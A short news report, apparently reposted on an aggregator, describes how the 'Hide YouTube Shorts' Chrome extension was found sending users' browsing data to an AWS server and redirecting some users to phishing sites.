A Chrome extension titled “Hide YouTube Shorts,” used by 100,000 people, was recently discovered to secretly collect users' browser activi

Popular Chrome Extension to Hide YouTube Shorts Turned Malicious

submited by
Style Pass
2024-11-12 20:30:14

A Chrome extension titled “Hide YouTube Shorts,” used by 100,000 people, was recently discovered to secretly collect users' browser activity, raising serious concerns about user privacy on Google Chrome Web Store.

Despite appearing to fulfill its stated purpose of hiding YouTube Shorts, the extension was caught transmitting detailed user data to an external server on AWS, potentially exposing numerous users to data theft and phishing attacks. The issue, brought to light by GitHub user ‘c0m4r' investigating suspicious activity, highlights significant security gaps in Google's vetting of Chrome extensions.

The extension's activity initially sparked suspicion when users began noticing unusual search suggestions on YouTube in various languages, seemingly disconnected from their search history. Further investigation into the extension's network activity revealed it was sending URLs, including specific paths and parameters, alongside other identifying information to a remote server on AWS. Detailed analysis uncovered that the extension was capturing sensitive browsing data, including a unique user ID, installation ID, timestamps, and potentially sensitive data from form entries.

After debugging the extension, c0m4r found that it was sending requests to a suspicious endpoint on AWS and redirecting some users to phishing sites. The extension's current version, 1.8.7, contains a script, background.js, which initiates these requests to an AWS-based API endpoint. Additionally, parts of the code reference an unfamiliar domain, “kra18.com,” which is associated with a potentially malicious DNS entry.

Leave a Comment